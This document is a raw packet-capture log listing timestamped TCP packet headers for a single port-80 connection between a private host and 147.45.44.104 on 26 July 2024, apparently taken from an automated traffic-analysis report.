Jul 26, 2024 18:56:48.827780008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.828344107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828353882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828363895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828373909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828383923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828392982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828402996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828412056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828422070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828429937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828432083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.828443050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828454018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828465939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828475952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828500986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.828598022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.829188108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829200029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829210043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829221010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829231024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829242945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829252958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829263926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829274893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829286098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829297066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829307079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829319000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.829361916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.829452991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.829998016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830008984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830018997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830029964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830040932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830050945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830064058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830074072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830079079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.830086946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830096006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830106974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830117941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830127954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830138922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830147982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830153942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830200911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.830261946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.830919027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830931902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830943108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830954075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830965042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830976009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830980062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.830986977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.830998898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831010103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831022024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831032991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831043005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.831043959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831058025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831069946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831080914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831091881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831116915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.831176043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.831963062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831974983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831984043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.831995010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832007885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832020044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832032919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832041979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.832046032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832057953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832068920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832078934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832089901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832099915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832112074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832118988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.832123041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.832195044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.833004951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833017111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833025932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833038092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833046913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833058119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833069086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833080053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833090067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833091974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.833101988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833115101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833125114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833136082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833147049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833157063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833158016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.833169937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833179951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.833237886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.929769993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.929833889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.929845095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.929857016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.929867983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.929878950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.929891109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.930038929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931277990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931291103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931303024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931319952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931330919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931340933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931354046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931359053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931365013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931377888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931405067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931418896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931431055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931432962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931442976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931454897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931464911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931466103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931479931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931490898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931493044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931503057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931514978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931524992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931529999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931536913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931555033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931565046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931571960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931582928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931596041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931598902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931607962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931612968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931634903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931638956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931648970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931660891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931670904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931672096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931685925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931696892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931709051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931719065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931730032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931740046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931740999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931754112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931766033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931776047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931787968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.931791067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931818008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.931844950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.932692051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932704926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932715893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932727098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932739973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932745934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932746887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.932755947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932770014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932780981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932782888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.932792902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932806015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932816982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932823896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.932827950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932840109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932851076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932852983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.932862997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.932885885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.932912111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933092117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933104038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933115959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933132887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933134079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933149099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933160067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933163881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933171988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933182955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933193922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933203936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933208942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933217049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933231115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933238983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933242083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933254957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933264971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933267117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933278084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933295012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933321953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933865070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933876991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933888912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933901072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933912039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933923006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933923006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933934927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933945894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933957100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933959961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.933969021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933979988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.933990002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934000969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934006929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934014082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934025049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934036016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934067965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934792995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934804916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934817076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934828997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934839010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934839010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934850931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934861898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934869051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934874058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934885979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934895992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934896946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934907913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934920073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934928894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934931040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934943914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.934961081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.934989929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017348051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017368078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017379045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017419100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017427921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017457962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017467976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017528057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017540932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017561913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017576933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017659903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017671108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017680883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017690897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017693043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.017707109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.017723083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018048048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018064976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018078089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018089056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018093109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018101931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018117905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018132925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018132925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018148899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018161058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018162012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018173933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018177032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018205881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018410921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018426895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018436909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018446922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018450022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018457890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018469095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018471956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018480062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018491030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018492937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018501997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018510103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018512964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018523932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018526077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018536091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018547058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.018547058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018570900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.018584967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019151926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019161940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019171000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019180059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019186020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019191027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019201040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019207954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019217968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019227982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019229889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019237995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019243956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019252062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019263029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019267082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019273996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019285917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019293070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.019299030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019308090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.019309998 CEST	49757	80	192.168.2.4	147.45.44.104
